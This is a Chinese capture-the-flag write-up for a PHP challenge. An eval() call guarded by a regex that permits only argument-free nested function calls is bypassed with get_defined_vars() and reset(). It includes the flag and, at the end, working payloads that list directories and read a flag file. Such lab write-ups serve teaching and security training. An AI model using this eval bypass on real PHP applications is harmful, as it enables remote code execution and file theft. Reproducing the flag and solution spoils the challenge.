题目信息:
| 题目名称 | 题目难度 |
|---|---|
| PHP-get_defined_vars | 2 |
题目考点:
get_defined_vars --- 返回由所有已定义变量所组成的数组此函数返回一个包含所有已定义变量列表的多维数组,这些变量包括环境变量、服务器变量和用户定义的变量。
Flag格式:
SangFor{tHOllYKRkqYkRWPS0zZf8z1QztC3q_2D}环境部署:
docker-compose.yml文件或者docker tar原始文件。
http://分配ip:2088题目writeup:
1、实验主页
2、源码分析
<?php
if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) {
eval($_GET['code']);
} else {
show_source(__FILE__);
}分析题目代码,逻辑十分清晰。
首先着眼这个正则表达式
[^\W]+\((?R)?\)其中"\[\]"表示匹配的开始结束,"^"表示取反。
\W,(注意这个W是大写的),匹配非字母、数字、下划线。等价于[^A-Za-z0-9_]。
所以[^\W]是对上面的\w取反: 匹配所有字母数字下划线的字母。
不太熟悉正则的注意正则中的 "+",是为了拼接整个表达式的,并不是需要我们匹配 "+",
然后是\((?R)?\):
其中两侧的\( 和\)表示匹配括号。
(?R),(?R)表示递归表达式本身,
(?R)?,最后的"?"表示匹配1个或者0个表达式本身,最后的 "?" 必不可少的。
整个正则是要把对应形式的内容提取出来,然后通过preg_replace函数,用空字符串进行代替,得到一个字符串必须是完全等于**";"**的。
简而言之,正则限制了只能执行一个函数,但不能设置参数。
这时候需要使用到一个php函数
get_defined_vars --- 返回由所有已定义变量所组成的数组此函数返回一个包含所有已定义变量列表的多维数组,这些变量包括环境变量、服务器变量和用户定义的变量。
用于返回定义的全部变量,这样就相当于可以获取任意位置传入变量值。
就可以通过next、current、reset来操纵这个数组,就可以获取到想要的变量值。
只需要reset所有的变量,然后只有当前get赋值,那么就只剩下get请求的变量了
查看目录结构,直到找到flag位置
?1=print_r(scandir('../'));//&code=eval(implode(reset(get_defined_vars())));
查询flag值
?1=readfile('../flag_phpbyp4ss');//&code=eval(implode(reset(get_defined_vars())));